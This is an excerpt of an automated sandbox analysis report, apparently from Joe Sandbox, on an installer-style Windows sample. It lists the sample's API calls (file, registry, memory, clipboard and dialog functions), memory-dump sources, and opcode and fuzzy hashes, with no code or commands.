                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                • GetLastError.KERNEL32 ref: 00405C2A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID:
                                                                • API String ID: 1375471231-0
                                                                • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                APIs
                                                                • CreateFileA.KERNELBASE(00000000), ref: 6FC62C57
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 9b3b552760ebe38cf33c3c864a5e3fe4f4004ee0fde3bd6f74fcbf06f66f621c
                                                                • Instruction ID: 311a3ce8bc288d8c4504069c6176e8b415501109f190396c7ccfa47d042dcb61
                                                                • Opcode Fuzzy Hash: 9b3b552760ebe38cf33c3c864a5e3fe4f4004ee0fde3bd6f74fcbf06f66f621c
                                                                • Instruction Fuzzy Hash: 1941BF7150C705EFDF149F69D9E4BE977B4EB49328F308826E601CA141E738E499CBA1
                                                                APIs
                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringWrite
                                                                • String ID:
                                                                • API String ID: 390214022-0
                                                                • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                APIs
                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                APIs
                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: PathSearch
                                                                • String ID:
                                                                • API String ID: 2203818243-0
                                                                • Opcode ID: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
                                                                • Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
                                                                • Opcode Fuzzy Hash: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
                                                                • Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0041307B,0040CEF0,00403579,0040CEF0,0041307B,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                APIs
                                                                • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(6FC6505C,00000004,00000040,6FC6504C), ref: 6FC62A9D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 20b627275ea14a1613930eb47eea94cd28f52adf5073e67c49a24e21f02c2214
                                                                • Instruction ID: 87faeb75d070964b9320bb48ea005e0d984c1c7c8e8a47399a39d0b428962a9b
                                                                • Opcode Fuzzy Hash: 20b627275ea14a1613930eb47eea94cd28f52adf5073e67c49a24e21f02c2214
                                                                • Instruction Fuzzy Hash: 3AF0ACB050CA82DECB50CF2E85447253BF0BB06324B344D2AE348D6247E374C064CB91
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
                                                                • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                • Opcode Fuzzy Hash: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
                                                                • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                APIs
                                                                • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                APIs
                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
                                                                • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                                • Opcode Fuzzy Hash: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
                                                                • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C
                                                                APIs
                                                                • GlobalAlloc.KERNELBASE(00000040,?,6FC612DB,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612C5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: AllocGlobal
                                                                • String ID:
                                                                • API String ID: 3761449716-0
                                                                • Opcode ID: eb398bdcad02f07d6be623f84e738c9e22fabe5368a75a9954f3c40a63e613b1
                                                                • Instruction ID: 5825e3c9c1547f256877127677f68d07b18efe5eb7c88faa367199281924b3a5
                                                                • Opcode Fuzzy Hash: eb398bdcad02f07d6be623f84e738c9e22fabe5368a75a9954f3c40a63e613b1
                                                                • Instruction Fuzzy Hash: 39B01270A0C401DFEE008B69CC06F353274F701311F044000F700C01C1C120C8208534
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                • GetClientRect.USER32(?,?), ref: 004058B3
                                                                • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                • ShowWindow.USER32(00000000), ref: 00405A02
                                                                • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                • ShowWindow.USER32(00000008), ref: 00405A51
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                • CreatePopupMenu.USER32 ref: 00405A96
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                • EmptyClipboard.USER32 ref: 00405B31
                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                • CloseClipboard.USER32 ref: 00405B8C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: H7B${
                                                                • API String ID: 590372296-2256286769
                                                                • Opcode ID: 0185fb71cb0ebac8bb253ddb79263eb6e3c4c27c477fa06c1930d1494c9be16a
                                                                • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
